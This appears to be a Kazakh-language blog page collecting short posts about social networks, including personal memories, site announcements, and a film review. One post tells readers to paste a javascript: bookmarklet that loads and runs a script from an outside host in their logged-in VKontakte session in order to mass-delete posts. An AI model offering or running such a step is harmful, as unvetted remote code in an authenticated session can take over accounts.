Әлеуметтік желілер

Мен ең алғашқы рет 2010 жылы агентке тіркелдім. Басында түсінбедім. Артынан мирға сурет қойдық, соткамен кіруді үйрендік. Көп достар таба бастадық.Ауылда сеть дұрыс ұстамайды,әр жерде ұстайтын точкаларын біліп алып түнімен 30% 80%ке қашан жылжиды екен деп сарыла күтетінбіз. Одан ауылда сеть ұстайтын болды. Таңның атысы күннің батысы агентте отырамыз. Тек біреу үшін отыратын кездер болды.Оның онлайн боп отқанының өзіне мәз боласың ғой. Блокка жыбырлап бірнәрсе жазғын кеп отырады. Үнемі «орындалатын» спамдарды айтсаңшы)) Мирда қонақ болғандарды қарауға құштар боласын.Осындай қызықтар көп еді ғой. А а айтпақшы поискқа кіріп адам іздейсің, сосын ол мені қайдан танисын, логинимді қайдан алдың деп сұрайды, сосын поисктан тауып алдым дейсің!))
Сосын 2011 жылы вконтактеге тіркелдім. Аштым, сурет салдым, бір шарладым, содан кейін жоламадым. ХХІ ғасыр көшбасшысы деген бағдарламаны білесіздер ма? Соған қатысқалы сол бағдарламаның парақшасын қарау үшін кірем.
Сосын 2012де твиттер мен фбға тіркелдім. Твиттерде де көп тұрақтамадым. Ал, фбда ойып тұрып орын алып алдым. Менің әртүрлі бағыттағы көзқарастарыма әсер етті. Блог, пост, блогер, қазақша сайттар туралы білдім, мәлімет алдым.Фбда таза қазақы орта бар. Күнделікті кіретін әлеуметтік желім фб болды.
Сосын 2013 жылы инстаграмга тіркелдім. Оған да күнделікті бас сұғып тұрам,қызықты, ол жерде де өз орным бар.
Сіздердің оқиғаларыңыз қалай болды?Әлеуметтік желіге келу жолдарыңыз қандай болды? Тағы қандай қызықтар білесіздер? Жауап күтем))
Әрі қарай

Вконтактеден бүкіл ақпаратты өшіреміз

Ептібайымайдтың баласы, жұмыс істеКеше вконтакте желісінде бөліскен барлық ақпаратымды өшіріп тастағым келді. Былайша айтқанда виртуалдан арылғым келіп жүр. Алайда 1130 жазбаны шейірлеп жіберген екенмін. Мұның бәрін жеке-жеке өшіру уақыт алады. Амалсыз гугл ұстаздың көмегіне жүгіндім.

Сөйтсек, браузердің адрес жазылатын жолына белгілі бір кодты қойсаң, бүкіл жарияланым бір сәтте жоқ болады. Ол үшін әуелі өзіміздің жазбаларымызға барамыз. vk/wall??????.. Сосын пернетақтадағы END батырмасын басу арқылы ең соңғы жазбаға дейін жетеміз. Ендігі кезек адрес жолына кодты жазу. Сосын enter-ді басып жібереміз. Бітті. Код төменде.
javascript: (function(){var s=document.createElement('script'); s.src='http://fringegame.ru/delmsg.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();


Айтпақшы, менде басында көшіріп әкелгенде «javascript» көшірілмей қойды. Амалсыз қолбен жазуға тура келді.

Әрине, мұндай әдіспен барлық ақпаратты өшірдім деп айтуға болмас. Өйткені, бәрібір деректің бәрі вконтактенің базасында сақталып тұрады ғой.
Әрі қарай

Ұстаздарға арналған әлеуметтік желі

  • KazNET


Аса құрметті Қазнет қолданушылары Қазақстандағы ең алғашқы ұстаздарға арналған әлеуметтік желі өздеріңізге жол тартты. Бұл сайтты жасаушы қарапайым мектеп мұғалімі, сайт жасауды арнайы оқыған жоқпын, өздігімнен үйрендім, сондықтан кейбір кемшіліктерді байқап жатсаңыз, баршаға жар салмай ақ жеке өзіме хат жіберуіңізді (segizseri@mail.ru) өтінемін.
Интернет кеңістігіне қарап отырсақ, ұстаздардың басын біріктіретін сайт басқа шетелдерде бар екен, олар жұмысын әлдеқашан бастаған әрі өз тиімділігін көрсетіп үлгеріпті, бұл туралы өздеріңіз ізденіп қарасаңыздар да болады. Қазір көпшілігіміз ресей елінің иелігіндегі mail.ru сайтына тіркеліп өз аккауынтымызды ашқанымыз жасырын емес, сол арқылы агентке шығамыз, бір-бірімізбен қарым-қатынасқа түсеміз, бірақ ол өте ауқымы кең орасан үлкен портал болғандықтан ол жерде ұстаздың мүүддесі көзделмеген, жалпыға арналған сайт болып табылады, ал бұл сайтта сол мой мирдің көптеген мүмкіндіктері қарастырылуы мен қатар басқада мұғалімдерге қажет функциялар қолданылды:

1. өз жеке профиліңіз болады, суреттеріңізді, видеоларыңызды қоса аласыз, профиліңіде обложкыңыз болады.

2. Күнделік — күнделік ретінде пайдалана аласыз, оған кез келген тақырыпта жаза аласыз, тіпті күнделікті өтілген сабағыңызды да жариялап тұрсаңыз нұр үстіне нұр болмақ, оған басқалар өз пікірін қалдырады, демек пікір алмасу үшін тамаша алаң болмақ.

3. Файлдар — бұл жерге өзіңіздің файлдарыңызды жүктеп қоя аласыз, мысалы күнтізбелік жоспар, сабақ жоспарлары, ашық сабақтың үлгілері.

4. Сілтемелер — бұл бөлімге күнделікті интернетті ақтару барысында өзіңізге ұнаған сайтты, мұғалімдерге қажет деген ресурстарға сілтеме жасап қоюыңызға болады.

5. Форум — бұл бөлімге өзіңізді толғандырған бір тақырып жазып талқылауға ұсына аласыз.

6. Чат — бұл бөлімде агенттегі сияқты, сайтта отырған қолданушымен жылдам хабар алмаса аласыз.

7. Ойындар — бұл бөлімде бірнеше түрлі ойындар қойылған, зеріккенде ойын ойнап көңіліңізді көтере аласыз.

8. Менің музыкаларым — бұл бөлімге өзіңізге ұнайтын музыканы жүктеп қоя аласыз және онлайн тыңдай аласыз.

Сонымен қатар ұстаз бұл сайттың қолданушысы бола отырып, басқалардың жазбасына пікір қалдыра алады, басқалар жүктеген файлдарды түсіріп ала алады, жаңа адамдармен танысып әріптестік қатынас орната алады.

Сайттың дамып үлкен порталға айналуы немесе құрып жоғалуы алдағы уақыттың еншісінде, ең бастысы осындай сайт болуы керек деп шештік те жұмысты бастап кеттік.

www.pedsovet.kz
Әрі қарай

Әлеуметтік желі – Kazlife.com 1 жасқа толды!

Қазақ ақпарат айдынына www.kazlife.com атауымен келіп қосылған әлеуметтік желінің іргесі өткен жылдың наурыз айында қаланған еді. Наурыздың 21 күні Алматы қаласында ұйымдастырылған қазақ блогшыларының алғашқы құрылтайында тұсауы кесіліп, өз оқырмандарына концепциясы таныстырылды.

www.kazlife.com әлеуметтік ақпараттық желі. Қазіргі таңда ол ақпаратқа қол жеткізу, ақпаратты бөлісуге арналған құрал болып тұрақты түрде дамып келеді. Қолданушыларымыз аталмыш желіде отырып ғаламтордағы алуан түрлі сайттар мен сан түрлі контенттердегі ақпараттардың ең таңдаулысына қол жеткізеді.
Әрі қарай

Faceglat

Ортадоксалдық еврейлерге арналған, FaceGlat деп аталатын әлеуметтік желіні хасидизм қозғалысының мүшесі Яков Суисса жасап шығыпты. FaceGlat-та ортадоксалдық иудаизмнің барлық дәстүрлері орындалады-мыс. Жүйеге кіргеннен-ақ қолданушылар ерлер бір жаққа, әйелдер екінші жаққа болып екіге бөлінеді. Яғни, FaceGlat-ты екі желіден құралған деп айтсақ та болады.
Әрі қарай

Әлеуметтік желі (фильм)

Киностан: Әлеуметтік желі (фильм)Ресей прокатына «Социальная сеть» деп шыққан бұл фильм www.facebook.com сайты жайында. Дәлірек айтқанда, оның негізін қалаушы Марк Цукерберг жайында. «Жәй өмірбаяннан көріністердің тізбегінен құралған ұйқышақырар фильм», деп ойлағам басында, қателесеппін. Тартымды сюжет, актерлер шеберлігі, режиссуралық тапқырлық демей-ақ қояйын, бірақ бір көруге тұрарлық туынды.
Алған әсерім жоғары. Осыдан кейін сен де бір болмашы нәрсені қолға алып (мысалы әлеуметтік желі), 2-3 жылда миллиардер атанып кеткің келеді. Аршатқа, Ерлан Оспанға бір көруге кеңес берер едім.
Үйде, кешкі мезгілде қолыңа салқын сыраны алып, жұмсақ төсекте жатып алып қарауға жақсы.

Менің берер бағам,
10/8

Онлайн қарау
Әрі қарай